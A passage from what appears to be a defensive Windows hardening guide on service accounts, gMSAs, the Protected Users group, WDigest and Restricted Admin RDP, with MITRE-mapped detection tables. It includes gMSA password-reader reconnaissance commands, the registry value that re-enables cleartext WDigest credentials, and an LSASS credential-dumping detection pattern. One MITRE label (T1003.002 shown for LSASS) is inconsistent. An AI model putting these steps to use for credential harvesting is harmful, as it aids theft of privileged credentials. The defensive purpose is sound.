<p><span>If a service account is only required to be leveraged on a single endpoint to run a specific service, the service account can be further restricted to only permit the account's usage on a predefined listing of endpoints (Figure 33).</span></p>
<ul>
<li><span>Active Directory Users and Computers &gt; Select the account</span>
<ul>
<li><span>Account tab</span>
<ul>
<li><span>Log On To button &gt; Select the proper scope of computers for access</span></li>
</ul>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig33.max-1000x1000.png" alt="Option to Restrict an Account to Log onto Specific Endpoints">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="i2oc9">Figure 33: Option to restrict an account to log onto specific endpoints</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Detection Opportunities for Service Account Logons</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Anomalous Logon from a Service Account</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for login attempts for a service account on a new (unexpected) endpoint. This will require baselining service accounts to expected (approved) systems.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 23: Detection opportunities for service account logons</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Managed/Group Managed Service Accounts</span></h4>
<p><span>Organizations with static service accounts should review the feasibility of migrating the service accounts to be managed service accounts (MSAs) or group managed service accounts (gMSAs).</span></p>
<p><span>MSAs were first introduced with the Windows Server 2008 R2 Active Directory schema (domain-functional level) and provide automatic password management (30-day rotation) for dedicated service accounts that are associated with running services on specific endpoints.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Standard MSA: The account is associated with a single endpoint, and the complex password for the account is automatically managed and changed on a predefined frequency (30 days by default). While an MSA can only be associated with a single computer account, multiple services on the same endpoint can leverage the MSA.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Group managed service account (gMSA): First introduced with Windows Server 2012 and are very similar to MSAs, but allow for a single gMSA to be leveraged across </span><span>multiple</span><span> endpoints.</span></p>
</li>
</ul>
<p><span>Common uses for MSAs and gMSAs:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Scheduled Tasks</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Internet Information Services (IIS) application pools</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Structured Query Language (SQL) services (SQL 2012 and later) – Express editions are </span><strong>not</strong><span> supported by MSAs.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Microsoft Exchange services</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Network Load Balancing (clustering) – gMSAs only</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Third-party applications that support MSAs</span></p>
</li>
</ul>
<p><strong>Note:</strong><span> </span><span>Threat actors can potentially discover accounts and groups that have permissions to read/leverage the password for a gMSA for privilege escalation and lateral movement. This can be accomplished by leveraging the </span><code>get-adserviceaccount</code><span> PowerShell cmdlet and enumerating the </span><code>msDS-GroupMSAMembership</code><span> (</span><code>PrincipalsAllowedToRetrieveManagedPassword</code><span>) configuration for a gMSA, which stores the security principals that can access the gMSA password. It is important that when configuring managed service accounts, organizations focus on restricting the scope of accounts and groups that have the ability to obtain and leverage the password for the managed service accounts and enforce structured monitoring of these accounts and groups.</span></p>
<p><span>For additional information related to MSAs and gMSAs, reference:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><a href="https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/managed-service-accounts-understanding-implementing-best/ba-p/397009" rel="noopener" target="_blank"><span>https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/managed-service-accounts-understanding-implementing-best/ba-p/397009</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><a href="https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview" rel="noopener" target="_blank"><span>https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview</span></a></p>
</li>
</ul>
<h4><span>Detection Opportunities for Managed/Group Managed Service Accounts</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Group Membership Addition</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1069/" rel="noopener" target="_blank"><span>T1069 – Permission Groups Discovery</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1098/" rel="noopener" target="_blank"><span>T1098 – Account Manipulation</span></a></p>
</td>
<td>
<p><span>Search for MSAs/gMSAs and the associated </span><code>PrincipalsAllowedToRetrieveManagedPassword</code><span> or </span><code>PrincipalsAllowedToDelegateToAccount</code><span> permissions, which could provide the ability to leverage the MSA/gMSA for malicious purposes.</span></p>
<p><span>Example reconnaissance commands for querying for MSAs/gMSAs and associated attributes:<br><br></span></p>
<pre class="language-plain"><code>get-adserviceaccount

get-adserviceaccount -filter {name -eq 'account-name'} -prop * | select Name, MemberOf, PrincipalsAllowedToDelegateToAccount, PrincipalsAllowedToRetrieveManagedPassword</code></pre>
<p><span>Figure 34: Example reconnaissance commands for querying for MSAs/gMSAs</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div><span>Table 24: Detection opportunities for managed/group managed service accounts</span></div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Protected Users Security Group</span></h4>
<p><span>By leveraging the Protected Users security group for privileged accounts, an organization can minimize various exposure factors and common exploitation methods by a threat actor or malware variant obtaining credentials for privileged accounts on disk or in memory from endpoints.</span></p>
<p><span>Beginning with Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2 (and above), the Protected Users security group was introduced to manage credential exposure within an environment. Members of this group automatically have specific protections applied to accounts, including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The Kerberos ticket granting ticket (TGT) expires after four hours, rather than the normal 10-hour default setting.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>No NTLM hash for an account is stored in LSASS, since only Kerberos authentication is used (NTLM authentication is disabled for an account).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Cached credentials are blocked. A domain controller must be available to authenticate the account.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>WDigest authentication is disabled for an account, regardless of an endpoint's applied policy settings.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DES and RC4 cannot be used for Kerberos preauthentication (Server 2012 R2 or higher); rather, Kerberos with AES encryption will be enforced.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Accounts cannot be used for either constrained or unconstrained delegation (equivalent to enforcing the </span><span>Account is sensitive and cannot be delegated</span><span> setting in Active Directory Users and Computers).</span></p>
</li>
</ul>
<p><span>To provide domain controller-side restrictions for members of the Protected Users security group, the domain functional level must be Windows Server 2012 R2 (or higher). Microsoft Security Advisory </span><a href="https://msrc-blog.microsoft.com/2014/06/05/an-overview-of-kb2871997/" rel="noopener" target="_blank"><span>KB2871997</span></a><span> adds compatibility support for the protections enforced for members of the Protected Users security group for Windows 7, Windows Server 2008 R2, and Windows Server 2012 systems.</span></p>
<p><span>Successful (Event IDs 303, 304) or failed (Event IDs 100, 104) logon events for members of the Protected Users security group can be recorded on domain controllers within the following event logs:</span></p>
<ul>
<li role="presentation">
<pre class="language-plain"><code>%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Authentication%4ProtectedUserSuccesses-DomainController.evtx</code></pre>
</li>
<li role="presentation">
<pre class="language-plain"><code>%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Authentication%4ProtectedUserFailures-DomainController.evtx</code></pre>
</li>
</ul>
<p><span>The event logs are disabled by default and must be enabled on each domain controller. The PowerShell cmdlets referenced in Figure 35 can be leveraged to enable the event logs for the Protected Users security group on a domain controller.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>$log1 = New-Object System.Diagnostics.Eventing.Reader.EventLogConfiguration Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController
$log1.IsEnabled=$true
$log1.SaveChanges()

$log2 = New-Object System.Diagnostics.Eventing.Reader.EventLogConfiguration Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController
$log2.IsEnabled=$true
$log2.SaveChanges()</code></pre>
<p><span>Figure 35: PowerShell cmdlets for enabling event logging for the Protected Users security group on domain controllers</span></p></div>
<div class="block-paragraph_advanced"><p><strong>Note:</strong><span> </span><span>Service accounts (including MSAs) should </span><strong>not</strong><span> be added to the Protected Users security group, as authentication will fail.</span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><span>If the Protected Users security group cannot be used, at a minimum, privileged accounts should be protected against delegation by configuring the account with the </span><span>Account is Sensitive and Cannot Be Delegated</span><span> flag in Active Directory.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Detection Opportunities for the Protected Users Security Group</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Removal of Account from Protected User Group</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1098/" rel="noopener" target="_blank"><span>T1098 – Account Manipulation</span></a></p>
</td>
<td>
<p><span>Search for an account that has been removed from the Protected Users group. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>Attempted Logon of an Account in the Protected User Group from a Nonprivileged Access Workstation</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for logon attempts from accounts in the Protected Users group authenticating from workstations of nonprivileged users.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 25: Detection opportunities for the Protected Users security group</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Clear-Text Password Protections</span></h4>
<p><span>In addition to restricting access for privileged accounts, controls should be enforced that minimize the exposure of credentials and tokens in memory on endpoints.</span></p>
<p><span>On older Windows versions, clear-text passwords are stored in memory (LSASS) to primarily support WDigest authentication. WDigest should be explicitly disabled on all Windows endpoints where it is not disabled by default.</span></p>
<p><span>By default, WDigest authentication is disabled in Windows 8.1+ and in Windows Server 2012 R2+.</span></p>
<p><span>Beginning with Windows 7 and Windows Server 2008 R2, after installing KB2871997, WDigest authentication can be configured either by modifying the registry or by using the Microsoft Security Guide GPO template from the <a href="https://www.microsoft.com/en-us/download/details.aspx?id=55319" rel="noopener" target="_blank">Microsoft Security Compliance Toolkit</a></span><span>.</span></p>
<h5><span>Registry Method</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
REG_DWORD = "0"</code></pre>
<p><span>Figure 36: Registry key and value for disabling WDigest authentication</span></p></div>
<div class="block-paragraph_advanced"><p><span>Another registry setting that should be explicitly configured is the </span><code>TokenLeakDetectDelaySecs</code><span> setting (Figure 37), which will clear credentials in memory of logged-off users after 30 seconds, mimicking the behavior of Windows 8.1 and above.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\TokenLeakDetectDelaySecs
REG_DWORD = "30"</code></pre>
<p><span>Figure 37: Registry key and value for enforcing the TokenLeakDetectDelaySecs setting</span></p></div>
<div class="block-paragraph_advanced"><h5><span>Group Policy Method</span></h5>
<p><span>Using the Microsoft Security Guide Group Policy template, WDigest authentication can be disabled via a GPO setting (Figure 38).</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MS Security Guide &gt; WDigest Authentication</span></p>
<ul>
<li aria-level="1"><span><span>Disabled</span></span></li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig38.max-1000x1000.png" alt="Disabling WDigest Authentication via the MS Security Guide Group Policy Template">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="11qec">Figure 38: Disabling WDigest authentication via the MS Security Guide Group Policy Template</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Additionally, an organization should verify that </span><code>Allow*</code><span> settings are not specified within the registry keys referenced in Figure 39, as this configuration would permit the </span><code>tspkgs</code><span>/CredSSP providers to store clear-text passwords in memory.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation</code></pre>
<p><span>Figure 39: Additional registry keys for hardening against clear-text password storage</span></p></div>
<div class="block-paragraph_advanced"><h5><span>Group Policy Reprocessing</span></h5>
<p><span>Threat actors can manually enable WDigest authentication on endpoints by directly modifying the registry (</span><code>UseLogonCredential</code><span> configured to a value of </span><code>1</code><span>). Even on endpoints where WDigest authentication is automatically disabled by default, it is recommended to enforce the GPO settings noted as follows, which will enforce automatic group policy reprocessing for the configured (expected) settings on an automated basis.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; System &gt; Group Policy &gt; Configure security policy processing</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Enabled - Process even if the Group Policy objects have not changed</span></p>
</li>
</ul>
</li>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; System &gt; Group Policy &gt; Configure registry policy processing</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Enabled - Process even if the Group Policy objects have not changed</span></p>
</li>
</ul>
</li>
</ul>
<p><strong>Note:</strong><span> </span><span>By default, Group Policy settings are only reprocessed and reapplied if the actual Group Policy was modified prior to the default refresh interval.</span></p>
<p><span>As KB2871997 is not applicable for Windows XP, Windows Server 2003, and Windows Server 2008, to disable WDigest authentication on these platforms, prior to a system reboot, WDigest needs to be removed from the listing of LSA security packages within the registry (Figure 40 and Figure 41).</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\Security Packages</code></pre>
<p><span>Figure 40: Registry key to modify LSA security packages</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig41.max-1000x1000.png" alt="LSA security Package Registry Key Before and After Removal of WDigest Authentication from Listing of Providers">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="71ljq">Figure 41: LSA security package registry key before and after removal of WDigest authentication from listing of providers</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Detection Opportunities for WDigest Authentication Conditions</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Enable WDigest Authentication</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1112/" rel="noopener" target="_blank"><span>T1112 – Modify Registry</span></a></p>
</td>
<td>
<p><span>Search for evidence of WDigest being enabled in the Windows Registry.<br><br></span></p>
<pre class="language-plain"><code>HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential

REG_DWORD = "1"</code></pre>
<p><span>Figure 42: WDigest Windows Registry modification</span></p>
</td>
</tr>
<tr>
<td>
<p><span>LSASS Memory Access</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1003/001/" rel="noopener" target="_blank"><span>T1003.002 - OS Credential Dumping - LSASS Memory</span></a></p>
</td>
<td>
<p><span>Monitor for processes accessing lsass.exe memory (Sysmon Event ID 10 with GrantedAccess 0x1010 or 0x1FFFFF). Alert on any non-system process opening a handle to LSASS. Deploy LSA Protection (RunAsPPL) and Credential Guard on all supported endpoints.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div><span>Table 26: Detection opportunities for WDigest authentication conditions</span></div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Credential Protections When Using RDP</span></h4>
<h5><span>Restricted Admin Mode for RDP</span></h5>
<p><span>Restricted Admin mode for RDP can be enabled for all end-user systems assigned to personnel that perform Remote Desktop connections to servers or workstations with administrative credentials. This feature can limit the in-memory exposure of administrative credentials on a destination endpoint when accessed using RDP.</span></p>
<p><span>To leverage Restricted Admin RDP, the command referenced in Figure 43 can be invoked.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>mstsc.exe /RestrictedAdmin</code></pre>
<p><span>Figure 43: Command to invoke restricted admin RDP</span></p></div>
<div class="block-paragraph_advanced"><p><span>When an RDP connection uses the Restricted Admin mode, if the authenticating account is an administrator on the destination endpoint, the credentials for the user account are </span><strong>not</strong><span> stored in memory; rather, the context of the user account appears as the destination machine account (</span><code>domain\destination-computer$</code><span>).</span></p>
<p><span>To leverage Restricted Admin mode for RDP, settings must be enforced on the originating endpoint in addition to the destination endpoint.</span></p>
<h6><span>Originating Endpoint (Client Mode - Windows 7 and Windows Server 2008 R2 and above)</span></h6>
<p><span>A GPO setting must be applied to the originating endpoint initiating the remote desktop session using the </span><span>Restricted Admin</span><span> feature.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; System &gt; Credential Delegation &gt; Restrict delegation of credentials to remote servers</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Require Restricted Admin</span><span> &gt; set to </span><span>Enabled</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Use the Following Restricted Mode</span><span> &gt; </span><span>Required Restricted Admin</span></p>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p><span>Configuring this GPO setting will result in the registry keys noted in Figure 44 being configured on an endpoint.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\Software\Policies\Microsoft\Windows\CredentialsDelegation\RestrictedRemoteAdministration
0 = Disabled
1 = Enabled

HKLM\Software\Policies\Microsoft\Windows\CredentialsDelegation\RestrictedRemoteAdministrationType
1 = Require Restricted Admin
2 = Require Remote Credential Guard
3 = Restrict Credential Delegation</code></pre>
<p><span>Figure 44: Registry settings for requiring Restricted Admin mode</span></p></div>
<div class="block-paragraph_advanced"><h6><span>Destination Endpoint (Server Mode - Windows 8.1 and Windows Server 2012 R2 and above)</span></h6>
<p><span>A registry setting will need to be configured (Figure 45).</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin
0 = Enabled
1 = Disabled</code></pre>
<p><span>Figure 45: Registry setting for enabling or disabling Restricted Admin RDP</span></p></div>
<div class="block-paragraph_advanced"><p><strong>Recommended:</strong><span> </span><span>Set the registry value to </span><code>0</code><span> to enable Restricted Admin mode.</span></p>
<p><span>With Restricted Admin RDP, another setting that should be configured is the </span><code>DisableRestrictedAdminOutboundCreds</code><span> registry key (Figure 46).</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdminOutboundCreds
0 = default value (doesn't exist) - Admin Outbound Creds are Enabled
1 = Admin Outbound Creds are Disabled</code></pre>
<p><span>Figure 46: Registry setting for disabling admin outbound credentials</span></p></div>
<div class="block-paragraph_advanced"><p><strong>Recommended:</strong><span> </span><span>Set the registry value to </span><code>1</code><span> to disable admin outbound credentials.</span></p>
<p><strong>Note:</strong><span> </span><span>With this setting set to </span><code>0</code><span>, any outbound authentication requests will appear as the system (</span><code>domain\destination-computer$)</code><span> that a user connected to using Restricted Admin mode. Setting this to </span><code>1</code><span> disables the ability to authenticate to any downstream network resources when attempting to authenticate outbound from a system that a user connected to using Restricted Admin mode for RDP.</span></p>
<p><span>For additional information regarding Restricted Admin mode for RDP, reference:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><a href="https://support.microsoft.com/kb/2973351" rel="noopener" target="_blank"><span>https://support.microsoft.com/kb/2973351</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><a href="https://blogs.technet.microsoft.com/kfalde/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2/" rel="noopener" target="_blank"><span>https://blogs.technet.microsoft.com/kfalde/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2/</span></a></p>
</li>
</ul>
<h4><span>Detection Opportunities for Restricted Admin Mode for RDP</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Disable Restricted Admin Mode for RDP</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1112/" rel="noopener" target="_blank"><span>T1112 – Modify Registry</span></a></p>
</td>
<td>
<p><span>Search for an account disabling Restricted Admin mode for RDP in the Windows Registry.<br><br></span></p>
<pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin 

REG_DWORD = "1"</code></pre>
<p><span>Figure 47: Restricted Admin mode for RDP being disabled in the Windows Registry on a destination endpoint</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Disable Require Restricted Admin</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1484/001/" rel="noopener" target="_blank"><span>T1484.001 – Domain Policy Modification: Group Policy Modification</span></a></p>
</td>
<td>
<p><span>Search for the </span><span>Require Restricted Admin</span><span> option being disabled within a GPO configuration. </span></p>
<pre class="language-plain"><code>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; System &gt; Credential Delegation &gt; Restrict delegation of credentials to remote servers

"Require Restricted Admin" &gt; set to Disabled</code></pre>
<p><span>Figure 48: Require Restricted Admin being disabled in a GPO</span></p>
</td>
</tr>
</tbody>
</table></div></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div><span>Table 27: Detection opportunities for Restricted Admin Mode for RDP</span></div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Windows Defender Remote Credential Guard</span></h4>
<p><span>For Windows 10 and Windows Server 2016 endpoints, Windows Defender Remote Credential Guard can be leveraged to reduce the exposure of privileged accounts in memory on destination endpoints when Remote Desktop is used for connectivity. With Remote Credential Guard, all credentials remain on the client (origination system) and are not directly exposed to the destination endpoint. Instead, the destination endpoint requests service tickets from the source as needed.</span></p>
<p><span>When a user logs in via RDP to an endpoint that has Remote Credential Guard enabled, none of the SSPs in memory store the account's clear-text password or password hash. Note that Kerberos tickets remain in memory to allow interactive (and single sign-on [SSO]) experiences from the destination server.</span></p>
<p><span>The Remote Desktop client (origination) host:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Must be running at least Windows 10 (v1703) to be able to supply credentials</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Must be running at least Windows 10 (v1607) or Windows Server 2016 to use the user's signed-in credentials (no prompt for credentials)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>User's account must be able to sign into both the client (origination) and the remote (destination) endpoint</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Must be running the Remote Desktop Classic Windows application</span></p>
</li>
<li aria-level="1">
